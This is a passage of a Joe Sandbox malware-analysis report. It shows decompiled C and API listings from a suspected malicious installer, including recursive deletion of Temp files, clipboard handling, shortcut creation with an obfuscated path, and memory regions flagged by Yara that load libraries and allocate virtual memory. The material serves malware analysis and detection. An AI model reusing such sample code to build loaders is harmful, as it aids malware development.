							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x6bdacc
								_t57 = _t119 + 0x34; // 0xffffffd6
								E0040559F( *_t57, _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x00405888
0x0040588f
0x004058ac
0x004058b3
0x004058b3
0x004058b9
0x004058c6
0x004058e4
0x004058e6
0x004058e7
0x004058ee
0x00405944
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x0040594d
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405960
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x0040598f
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059b8
0x004059be
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f0
0x004059f6
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f0
0x004058f6
0x00405926
0x00405928
0x0040592e
0x00405930
0x00405936
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(0001041E,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: baf2ad6892b5c9ef88bd70007bec6f64648b90cdea62245104eba29d0ef25511
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: baf2ad6892b5c9ef88bd70007bec6f64648b90cdea62245104eba29d0ef25511
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

., xrefs: 00405D04
., xrefs: 00405D18
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 02AD4F37 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 1027
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%}?b, xrefs: 02AD5BE9
l&I], xrefs: 02AD54B6
l&I], xrefs: 02AD54BB

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: %}?b$l&I]$l&I]
API String ID: 3389902171-3838461540
Opcode ID: 0af3f9886d7e21aa318378c66a07f8baab32a272df54d77d2a3ddbf4da8a3793
Instruction ID: 6198f18f42cbff1bde6c69316bad5870655eca694cbd60959048ad6069b3baa0
Opcode Fuzzy Hash: 0af3f9886d7e21aa318378c66a07f8baab32a272df54d77d2a3ddbf4da8a3793
Instruction Fuzzy Hash: 6C723B34A443868FDF359F38C9E47DA7BA29F133A0F99816ECC968B196DB314446C712

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3ECE Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 282memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02AD30F0: LoadLibraryA.KERNELBASE(?), ref: 02AD3203

NtAllocateVirtualMemory.NTDLL(-7040BA74,?,-0234DF94), ref: 02AD41C4

Strings

0Bh, xrefs: 02AD425A

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: 0Bh
API String ID: 2616484454-3315039483
Opcode ID: e1d3674897020c63187704d9b5299f8b0c7922766cf3576200239cd655fcec3a
Instruction ID: e0370bc03603be1923f3419239fb102aef056a11834965cbf0d7b86016dd159c
Opcode Fuzzy Hash: e1d3674897020c63187704d9b5299f8b0c7922766cf3576200239cd655fcec3a
Instruction Fuzzy Hash: 10917B71A0434ADFDF306E689DA97DA37B2AF163A0F95012EDC8A5B204D7358985CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02AC6A1D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

`, xrefs: 02AC6BE8
pH', xrefs: 02AC6B02

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: `$pH'
API String ID: 0-1335892094
Opcode ID: 29e22742ad0db6132339963a9f867afc5d17a4a9edea425fffb956324c5ad5c5
Instruction ID: c01859cc8adee6a5d640891668bfbd808dee18d84d10abf170c748eaacf35815
Opcode Fuzzy Hash: 29e22742ad0db6132339963a9f867afc5d17a4a9edea425fffb956324c5ad5c5
Instruction Fuzzy Hash: C5516B75B0034ADFDF309E788EA93DE36A7DF55790FA5412ECC499B144DB3186868B02

Uniqueness

Uniqueness Score: -1.00%

Function 02AC72FC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 380libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Strings

0E, xrefs: 02AC73C0

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 0E
API String ID: 1029625771-2513510507
Opcode ID: 279e86f0c9b88369204c6d8dce46fdac7186af31afb174db97caa05785c18edf
Instruction ID: 4c859ba48678d2e7f6e8440cf7e061df526d22ae823967ff1e2697d6a830a6af
Opcode Fuzzy Hash: 279e86f0c9b88369204c6d8dce46fdac7186af31afb174db97caa05785c18edf
Instruction Fuzzy Hash: EDD1757164434A9FDF349E388DA47DB37A7EF66790F91412ECC899B204DB318986CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02ACB16D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Strings

"px, xrefs: 02ACB6C9

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "px
API String ID: 1029625771-3637282809
Opcode ID: e484ffc0855224ecdbb8961cb1bb17619bbc73138e05db0db40255a494aaa61c
Instruction ID: e71e5351d8180bf122f50f702b420eba905e87929d5c94452ec479bd22d052d1
Opcode Fuzzy Hash: e484ffc0855224ecdbb8961cb1bb17619bbc73138e05db0db40255a494aaa61c
Instruction Fuzzy Hash: 799108B57003079FDF209E6889B97D637A2AF663D0FD50129DCCA97205E7358847CB15

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick
API String ID: 542301482-2621469430
Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

